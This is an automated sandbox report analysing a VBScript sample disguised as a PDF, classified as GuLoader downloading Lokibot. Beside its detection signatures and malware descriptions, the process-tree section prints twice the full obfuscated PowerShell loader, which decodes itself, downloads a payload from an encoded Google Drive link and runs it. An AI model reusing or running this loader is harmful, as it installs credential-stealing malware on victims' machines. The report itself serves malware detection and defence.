Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Aj#U00e1nlatk#U00e9r#U00e9s 09-30-2024#U00b7pdf.vbs

Overview

General Information

Sample name:Aj#U00e1nlatk#U00e9r#U00e9s 09-30-2024#U00b7pdf.vbs
renamed because original name is a hash value
Original sample name:Ajnlatkrs 09-30-2024pdf.vbs
Analysis ID:1523162
MD5:34273527e12e172917598d0e29994432
SHA1:d390fd4b4ffc45be0a7cf05765af19e402377640
SHA256:2c2a57b3a137d49c53bf35a36a7136a78d67fcaa16b8f352a6b46a457d691815
Tags:Lokivbsuser-abuse_ch
Infos:

Detection

GuLoader, Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Lokibot
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 1988 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Aj#U00e1nlatk#U00e9r#U00e9s 09-30-2024#U00b7pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7156 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Linnas Kandidtwr overskyet Ecdysial Hjlandene Providentialism Selekteringer #>;$Rystelses='Makeress';<#plungy Firdobling Preferrers Aftvingende Encoders Hardier Forsvarschefernes #>;$Hvsnings=$host.PrivateData;If ($Hvsnings) {$narrishkeit++;}function atomangreb($Antipapistical246){$Bondske=$Fremmeligst+$Antipapistical246.Length-$narrishkeit;for( $Halfheartednesses=5;$Halfheartednesses -lt $Bondske;$Halfheartednesses+=6){$minkfarven+=$Antipapistical246[$Halfheartednesses];}$minkfarven;}function rme($Stillehavsflaadernes){ . ($posthume) ($Stillehavsflaadernes);}$Gulvmaattens=atomangreb 'SpinaMb ugeoSade zSkyldiD.rivlTsarelPartea Hexi/ uror5Angin. Prod0A.tin Manom(skonnWmyoepibarsen MigodUnaudo SulfwSnv.es Lati Kons NBaan.TIniti Kldni1Regis0Bolig.Kirop0Opsam; Civi AntyW Pub iVir,lnWid.w6Rance4 igna;alene A,tabxReemk6Crabb4Speci;Handl IrettrAl,miv Budg:midda1Colpe2N dbr1Bombe. Hosl0Under)Ambit SubelGRenteeU eldcValthkMeethoHyper/In,ho2 Dune0 etnk1 List0 Medb0Nark 1Subef0Alder1 onr WicksFVaginiTwi.trB rguephanefSci,soEnga,xVandl/Gstel1 umsk2 Feri1Skaks.,inkl0 lge ';$librettoens=atomangreb ' alibU Tea,s CirceSui tRBegav- Geopa StorgInhomeIa.hinGarruTDisge ';$Broderierne=atomangreb 'DimplhAntietDistitGastepB,nussKrake:Ungdo/Funkt/Over.d B llr SelviAfd,ivR vieeAfkri.Drogsg RekloBidraoBe,vegIn.mulmarkseR,gnf.FigetcTuberoFamldm tang/.asteuBev.dcP eud?LammieWorkuxUdsk.pDunbaoTilm rRehant P lm=UnuandCaddioMaskiwkinemnVbnenlDelsao SnivaAtolldTegni&AlumriSm gsdBendi= Paal1 UriniIndtjs RecrL A acUDrapezM.dermSilenFdataiJLige 8Su co9 Dobbm knusOTo fl5ContofOrnam9IngenGLingul TomhoSko euZarisount,uL skdyyRefluVCanon7UdtmtqAdmetEMos itUnderw,avsprDividtFattiRTransuPalma ';$Udviskning=atomangreb 'stose>Nedfr ';$posthume=atomangreb 'BargiiMarkoE SkibX oso ';$Cassina='Kendetegner';$Dentine='\Smaalige.Eks';rme (atomangreb 'Rabat$Noncog Tap lNacroo enlsbE segapsychlStagn:AntisO oodvBo ene alkarForbecPsa ooGrundaM rcet Bire= Dy,t$ .ispeMedionvatikv orev:Tr chaPredapBarfop Scled FraiaMatert eskaaVigil+Bes,a$Dem eDB rmae AndrnSeawat oomsiSpi.nnProloeHa de ');rme (atomangreb ' Viva$PedotgDisselT rmkoSairlb PretaFlig.lClogg: KlasURemain Sregs uspet Hoveu agidSpa ei Op,eeReadodPerp.nSaddueAnke s,oextsKommu=Te,te$DriveB urmarT llgoKarnedBioloeVrlesrHeterinons e,athirOleosnInpute Succ.Illu.s Phy p Swi.lFusibiSerpetEkstr(A ous$Anti,UUnderdG udev,ndiui mprosUnshak OpmanOrga iTroopn J.ckgFarth)Staal ');rme (atomangreb ',arak[ KortNPneumeSo attSkovb.SkrmfSOverpeGarnerEnjoyvSlowmiBauxicU.eskeBrndePUndiso.ealiiFladfn Non tS,okiMPrvepaSquifnPortea GonogDemimeAfspnrOtten] Rip :fagbl: MainSF emmeKontrcBud ruLektir Knowi MldttTo nfyShantPver er KammoSymmet Vo doFl.decstratoStranlModpa Heter=Mini Brneb[drot N,erieeRaah t.umle.ForfrSFiloseMyretcStjfruUdlaarGar liBilbotSpilly tartPHock,rEpicloPapert S lioTagkacFrsteo Li,ilCoh,bT Yanoy aurepBeclaeTypec]Prize:Antnd:Re tiTMagnelFordoscadea1 Taoi2Tredi ');$Broderierne=$Unstudiedness[0];$Skomager=(atomangreb ',idde$Ka hagHresvl StamO Kal b S.ocAUnrislTvist:SlagtBRe rojAfhj R S,ilN .uckeProgn=konstn rfrieSphenw cle,- AnemOKartoBHaartJVacuueTrnincDoktoTstige UgunsSDigitYNonexSFlu,stFejlkeSvmmem Trol.DhanuNEfferEProcotUmrke.BugseWBi.leeKalasb.railCRustnlpressILaa.eEtil uNverfeT I dg ');rme ($Skomager);rme (atomangreb 'Prize$ phorBDebaujHuahurOpst nTyfo eFrimr.WaddlHMalkieMis aa nhiddVaasbe,imilr CadisE.for[Forbe$YlettlFaunii Teleb Absur,esideSc.lpt.rbort Debao Ke,beAlh.nnVandlsLogic]Pregg=Reviv$ SociG Mi.tuSclerlNiobivPersomFatteaSk igaGaul tincu t Aa.seSpongnBugvgs P.ra ');$Perdition=atomangreb ' ispl$.rdseBContrjTetrarQuin,n So.keDrage.Trap DHo umoIstn.wR.ingn Panelfragao eiteaSlotedComplFb dehiDrtril G noeKabin(Ma ie$urfunBDisporSpillo Opk dKvruleFdepurPaxili U.gieForgrrSt,drnPuddledipte, Sexi$M nipPforudr.urrao BayepWoulde Mordlruffi) Bypl ';$Propel=$Overcoat;rme (atomangreb 'Ciste$Dra ogEtaetl Ref OTrkg.bPur eaSquabl Scap:KraveCReteaATilbar nfopUnprooAudivGCaseheFago nNur,uOHapchUInappsResid=Nedfa(C.ingtYokele,kulpsForthTlibe -Dyse P HungAFlygtt GiesHOverr baand$ D poPHem tRMilliO raadPAutosEAbstilRefe,) Ass ');while (!$Carpogenous) {rme (atomangreb 'Resum$ ensogKendel Udtao drmmbSgemeaStalkl Br.v: ordiMCha giHem ssKompltTilskiOxy.el Endel LkkeiLgekod pyreeRa.binerotosReall=undia$BilistKostprR allu In teStorf ') ;rme $Perdition;rme (atomangreb 'StreaSSporttsarada Muddr NucutSsyge-revolS irazlLydm eAfseneStachpBa ne olio4 Keou ');rme (atomangreb 'Vir e$Mesteg Co plNordfoNigribBl,ffa Seatl .yrt:fiskeC C,mpa A.terOrthop Eegso oneqgMis ielocomnUlt,aoPrejuu E shs Tppe= Vita(SphalTudrejeDucktsJinritFusti- EnfoPGidseaMed.ctGrupphCirc Navn $,nderPMaarhrV ntroUf rep R maePhosplVener) Gru, ') ;rme (atomangreb 'toywo$ klekgChurllSaboloLs,efbF,actaB jstlPapir: eterODri.kp Fal.tKlammr DazekCh,kenSerioiIndecn arkegLitte= pere$Transg EpislR dakoGr skbSmileaSkriflSyrak:MiswiDIndiai lansSquatp IsoceFo skr Epi,sPr noiO bluo.allon eriseOverer EndonSpej eFlock+S lvr+Gonoz%A omi$UranoUPege,nL llis VaastunaccuEno.mdPantoiLe,icesad ldffebenDispoeAlkohs Tweis .ita. ByrecBoglao MiniuUpswenSt ert heck ') ;$Broderierne=$Unstudiedness[$Optrkning];}$Diktatet=320570;$Syntaksgenkendelserne=31274;rme (atomangreb ' Laan$StartgCoronlMultio OverbUforua .razlAngli:BurnePSuperaBillerBenefaFdresdDischeGall favetguAn dilOutpu Re n=D ama FortjGGravee RundtCargo-mesioC NeuroHerben BandtFosseeKidnanSubcot emia Odor $MissePZenitrFinano Datap s ideVordil Ou s ');rme (atomangreb ' Pra $Gene gskrbelFo gio servbBommeaudma lAnlgg:Sa,elSNaadeyCoequdSavenfAk amoStrtarT rbah AblenY uthgIrvine upernTurcye uzzwsFo nj Udma =Edelh Succe[ GlasSNynazyMikros obbet KeyweParenm Foxd.SpandCRadiaoTransn vetsvTs.tseOlenirB,nkotExcav]Galac:Cani :EstabF ittirCalisoMicromCo toBCorklaDimwisUnp reJurym6Jalou4TsardSnedbrt FzfurPussyiSp ngnGudf.g Ridd(Unjag$ DeodPC lloaMatsar OrdraB,odid Vareep nfefExtrauGlog lZonei) snak ');rme (atomangreb 'Bees,$AgacegR.genlInteroSpaltb landa Vandlfritj: P osRMongreBrancg .omgiTilvioAfs.anSlibrpSphyglMudpuaLv konQuan aThyrorBluenbFir.eeAmetyjLungedByplae,urbarDanse didra=Scrim Ungra[NaboiSTo guyGuya sDramatAskebeTotalmLatin.Unr cT Ve beOverhx OvertBacch. BronE BiolnGoderc moutoFu,igd Missi,iphtn C,tagPreto]Emnea:Nonme:EarthA FlugS atiCPl nuITr,ncIRiefs.JudicGAa dleZygodt illiSEftertjesp,rKeyseiPolonn ispugOutpo(,onoc$ Sk.uSSte tyCheq d CongfLejefoJeme rEndebhF,cadnskewigCho.neTyfusn ameeBro,esVenal) Kyma ');rme (atomangreb 'B,ndo$Ma.neg LupulOvertoLock bFam,laVansilunri :TopfiSDerbunHomoeiSemirgManuav UdkoeAparujAktieeTowie= Bibl$PackeRSanyaeTraadgFeltniintero Led nUnexhpNelielSkykla godvnMeddea mprirPompobRakkeeNostajTheopd Uns eFlankrAfhre.skodds Cinqu etrob Pakhs BagttFremlrBrunliGdni,n OpacgBo se(Tan.k$SuffrD Actiigartnk ap rtMe.tia TambtGimpeeNiftitstavl,Pamfi$DirekS ,artyJ mban Lit tGodstaward k.ntelsHellig RegieBeskynSmedekUnsp,eHeternMen edO ceteK ptalFlgessTakeue RethrT.agin raggeTires) Baad ');rme $Snigveje;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 1292 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Linnas Kandidtwr overskyet Ecdysial Hjlandene Providentialism Selekteringer #>;$Rystelses='Makeress';<#plungy Firdobling Preferrers Aftvingende Encoders Hardier Forsvarschefernes #>;$Hvsnings=$host.PrivateData;If ($Hvsnings) {$narrishkeit++;}function atomangreb($Antipapistical246){$Bondske=$Fremmeligst+$Antipapistical246.Length-$narrishkeit;for( $Halfheartednesses=5;$Halfheartednesses -lt $Bondske;$Halfheartednesses+=6){$minkfarven+=$Antipapistical246[$Halfheartednesses];}$minkfarven;}function rme($Stillehavsflaadernes){ . ($posthume) ($Stillehavsflaadernes);}$Gulvmaattens=atomangreb 'SpinaMb ugeoSade zSkyldiD.rivlTsarelPartea Hexi/ uror5Angin. Prod0A.tin Manom(skonnWmyoepibarsen MigodUnaudo SulfwSnv.es Lati Kons NBaan.TIniti Kldni1Regis0Bolig.Kirop0Opsam; Civi AntyW Pub iVir,lnWid.w6Rance4 igna;alene A,tabxReemk6Crabb4Speci;Handl IrettrAl,miv Budg:midda1Colpe2N dbr1Bombe. Hosl0Under)Ambit SubelGRenteeU eldcValthkMeethoHyper/In,ho2 Dune0 etnk1 List0 Medb0Nark 1Subef0Alder1 onr WicksFVaginiTwi.trB rguephanefSci,soEnga,xVandl/Gstel1 umsk2 Feri1Skaks.,inkl0 lge ';$librettoens=atomangreb ' alibU Tea,s CirceSui tRBegav- Geopa StorgInhomeIa.hinGarruTDisge ';$Broderierne=atomangreb 'DimplhAntietDistitGastepB,nussKrake:Ungdo/Funkt/Over.d B llr SelviAfd,ivR vieeAfkri.Drogsg RekloBidraoBe,vegIn.mulmarkseR,gnf.FigetcTuberoFamldm tang/.asteuBev.dcP eud?LammieWorkuxUdsk.pDunbaoTilm rRehant P lm=UnuandCaddioMaskiwkinemnVbnenlDelsao SnivaAtolldTegni&AlumriSm gsdBendi= Paal1 UriniIndtjs RecrL A acUDrapezM.dermSilenFdataiJLige 8Su co9 Dobbm knusOTo fl5ContofOrnam9IngenGLingul TomhoSko euZarisount,uL skdyyRefluVCanon7UdtmtqAdmetEMos itUnderw,avsprDividtFattiRTransuPalma ';$Udviskning=atomangreb 'stose>Nedfr ';$posthume=atomangreb 'BargiiMarkoE SkibX oso ';$Cassina='Kendetegner';$Dentine='\Smaalige.Eks';rme (atomangreb 'Rabat$Noncog Tap lNacroo enlsbE segapsychlStagn:AntisO oodvBo ene alkarForbecPsa ooGrundaM rcet Bire= Dy,t$ .ispeMedionvatikv orev:Tr chaPredapBarfop Scled FraiaMatert eskaaVigil+Bes,a$Dem eDB rmae AndrnSeawat oomsiSpi.nnProloeHa de ');rme (atomangreb ' Viva$PedotgDisselT rmkoSairlb PretaFlig.lClogg: KlasURemain Sregs uspet Hoveu agidSpa ei Op,eeReadodPerp.nSaddueAnke s,oextsKommu=Te,te$DriveB urmarT llgoKarnedBioloeVrlesrHeterinons e,athirOleosnInpute Succ.Illu.s Phy p Swi.lFusibiSerpetEkstr(A ous$Anti,UUnderdG udev,ndiui mprosUnshak OpmanOrga iTroopn J.ckgFarth)Staal ');rme (atomangreb ',arak[ KortNPneumeSo attSkovb.SkrmfSOverpeGarnerEnjoyvSlowmiBauxicU.eskeBrndePUndiso.ealiiFladfn Non tS,okiMPrvepaSquifnPortea GonogDemimeAfspnrOtten] Rip :fagbl: MainSF emmeKontrcBud ruLektir Knowi MldttTo nfyShantPver er KammoSymmet Vo doFl.decstratoStranlModpa Heter=Mini Brneb[drot N,erieeRaah t.umle.ForfrSFiloseMyretcStjfruUdlaarGar liBilbotSpilly tartPHock,rEpicloPapert S lioTagkacFrsteo Li,ilCoh,bT Yanoy aurepBeclaeTypec]Prize:Antnd:Re tiTMagnelFordoscadea1 Taoi2Tredi ');$Broderierne=$Unstudiedness[0];$Skomager=(atomangreb ',idde$Ka hagHresvl StamO Kal b S.ocAUnrislTvist:SlagtBRe rojAfhj R S,ilN .uckeProgn=konstn rfrieSphenw cle,- AnemOKartoBHaartJVacuueTrnincDoktoTstige UgunsSDigitYNonexSFlu,stFejlkeSvmmem Trol.DhanuNEfferEProcotUmrke.BugseWBi.leeKalasb.railCRustnlpressILaa.eEtil uNverfeT I dg ');rme ($Skomager);rme (atomangreb 'Prize$ phorBDebaujHuahurOpst nTyfo eFrimr.WaddlHMalkieMis aa nhiddVaasbe,imilr CadisE.for[Forbe$YlettlFaunii Teleb Absur,esideSc.lpt.rbort Debao Ke,beAlh.nnVandlsLogic]Pregg=Reviv$ SociG Mi.tuSclerlNiobivPersomFatteaSk igaGaul tincu t Aa.seSpongnBugvgs P.ra ');$Perdition=atomangreb ' ispl$.rdseBContrjTetrarQuin,n So.keDrage.Trap DHo umoIstn.wR.ingn Panelfragao eiteaSlotedComplFb dehiDrtril G noeKabin(Ma ie$urfunBDisporSpillo Opk dKvruleFdepurPaxili U.gieForgrrSt,drnPuddledipte, Sexi$M nipPforudr.urrao BayepWoulde Mordlruffi) Bypl ';$Propel=$Overcoat;rme (atomangreb 'Ciste$Dra ogEtaetl Ref OTrkg.bPur eaSquabl Scap:KraveCReteaATilbar nfopUnprooAudivGCaseheFago nNur,uOHapchUInappsResid=Nedfa(C.ingtYokele,kulpsForthTlibe -Dyse P HungAFlygtt GiesHOverr baand$ D poPHem tRMilliO raadPAutosEAbstilRefe,) Ass ');while (!$Carpogenous) {rme (atomangreb 'Resum$ ensogKendel Udtao drmmbSgemeaStalkl Br.v: ordiMCha giHem ssKompltTilskiOxy.el Endel LkkeiLgekod pyreeRa.binerotosReall=undia$BilistKostprR allu In teStorf ') ;rme $Perdition;rme (atomangreb 'StreaSSporttsarada Muddr NucutSsyge-revolS irazlLydm eAfseneStachpBa ne olio4 Keou ');rme (atomangreb 'Vir e$Mesteg Co plNordfoNigribBl,ffa Seatl .yrt:fiskeC C,mpa A.terOrthop Eegso oneqgMis ielocomnUlt,aoPrejuu E shs Tppe= Vita(SphalTudrejeDucktsJinritFusti- EnfoPGidseaMed.ctGrupphCirc Navn $,nderPMaarhrV ntroUf rep R maePhosplVener) Gru, ') ;rme (atomangreb 'toywo$ klekgChurllSaboloLs,efbF,actaB jstlPapir: eterODri.kp Fal.tKlammr DazekCh,kenSerioiIndecn arkegLitte= pere$Transg EpislR dakoGr skbSmileaSkriflSyrak:MiswiDIndiai lansSquatp IsoceFo skr Epi,sPr noiO bluo.allon eriseOverer EndonSpej eFlock+S lvr+Gonoz%A omi$UranoUPege,nL llis VaastunaccuEno.mdPantoiLe,icesad ldffebenDispoeAlkohs Tweis .ita. ByrecBoglao MiniuUpswenSt ert heck ') ;$Broderierne=$Unstudiedness[$Optrkning];}$Diktatet=320570;$Syntaksgenkendelserne=31274;rme (atomangreb ' Laan$StartgCoronlMultio OverbUforua .razlAngli:BurnePSuperaBillerBenefaFdresdDischeGall favetguAn dilOutpu Re n=D ama FortjGGravee RundtCargo-mesioC NeuroHerben BandtFosseeKidnanSubcot emia Odor $MissePZenitrFinano Datap s ideVordil Ou s ');rme (atomangreb ' Pra $Gene gskrbelFo gio servbBommeaudma lAnlgg:Sa,elSNaadeyCoequdSavenfAk amoStrtarT rbah AblenY uthgIrvine upernTurcye uzzwsFo nj Udma =Edelh Succe[ GlasSNynazyMikros obbet KeyweParenm Foxd.SpandCRadiaoTransn vetsvTs.tseOlenirB,nkotExcav]Galac:Cani :EstabF ittirCalisoMicromCo toBCorklaDimwisUnp reJurym6Jalou4TsardSnedbrt FzfurPussyiSp ngnGudf.g Ridd(Unjag$ DeodPC lloaMatsar OrdraB,odid Vareep nfefExtrauGlog lZonei) snak ');rme (atomangreb 'Bees,$AgacegR.genlInteroSpaltb landa Vandlfritj: P osRMongreBrancg .omgiTilvioAfs.anSlibrpSphyglMudpuaLv konQuan aThyrorBluenbFir.eeAmetyjLungedByplae,urbarDanse didra=Scrim Ungra[NaboiSTo guyGuya sDramatAskebeTotalmLatin.Unr cT Ve beOverhx OvertBacch. BronE BiolnGoderc moutoFu,igd Missi,iphtn C,tagPreto]Emnea:Nonme:EarthA FlugS atiCPl nuITr,ncIRiefs.JudicGAa dleZygodt illiSEftertjesp,rKeyseiPolonn ispugOutpo(,onoc$ Sk.uSSte tyCheq d CongfLejefoJeme rEndebhF,cadnskewigCho.neTyfusn ameeBro,esVenal) Kyma ');rme (atomangreb 'B,ndo$Ma.neg LupulOvertoLock bFam,laVansilunri :TopfiSDerbunHomoeiSemirgManuav UdkoeAparujAktieeTowie= Bibl$PackeRSanyaeTraadgFeltniintero Led nUnexhpNelielSkykla godvnMeddea mprirPompobRakkeeNostajTheopd Uns eFlankrAfhre.skodds Cinqu etrob Pakhs BagttFremlrBrunliGdni,n OpacgBo se(Tan.k$SuffrD Actiigartnk ap rtMe.tia TambtGimpeeNiftitstavl,Pamfi$DirekS ,artyJ mban Lit tGodstaward k.ntelsHellig RegieBeskynSmedekUnsp,eHeternMen edO ceteK ptalFlgessTakeue RethrT.agin raggeTires) Baad ');rme $Snigveje;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 2320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 2944 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 1096 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 6768 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 6204 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 2704 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 5532 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 7100 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 7060 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 5276 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 6292 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 1564 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • dxdiag.exe (PID: 1960 cmdline: "C:\Windows\syswow64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
    • dxdiag.exe (PID: 7156 cmdline: "C:\Windows\syswow64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
    • dxdiag.exe (PID: 1900 cmdline: "C:\Windows\syswow64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
No configs have been found
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
    SourceRuleDescriptionAuthorStrings
    00000004.00000002.3059410794.0000000008A30000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      00000014.00000002.3335131309.000000000603C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
        00000004.00000002.3059770247.000000000A8DE000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          00000002.00000002.2221990774.000001F3C0564000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
            00000004.00000002.3047323826.0000000005C5B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
              Click to see the 6 entries
              SourceRuleDescriptionAuthorStrings
              amsi64_7156.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                amsi32_1292.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                • 0xc764:$b2: ::FromBase64String(
                • 0xb7f5:$s1: -join
                • 0x4fa1:$s4: +=
                • 0x5063:$s4: +=
                • 0x928a:$s4: +=
                • 0xb3a7:$s4: +=
                • 0xb691:$s4: +=
                • 0xb7d7:$s4: +=
                • 0x15b50:$s4: +=
                • 0x15bd0:$s4: +=
                • 0x15c96:$s4: +=
                • 0x15d16:$s4: +=
                • 0x15eec:$s4: +=
                • 0x15f70:$s4: +=
                • 0xc00c:$e4: Get-WmiObject
                • 0xc1fb:$e4: Get-Process
                • 0xc253:$e4: Start-Process
                • 0x167eb:$e4: Get-Process

                System Summary

                barindex
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Aj#U00e1nlatk#U00e9r#U00e9s 09-30-2024#U00b7pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Aj#U00e1nlatk#U00e9r#U00e9s 09-30-2024#U00b7pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Aj#U00e1nlatk#U00e9r#U00e9s 09-30-2024#U00b7pdf.vbs", ProcessId: 1988, ProcessName: wscript.exe
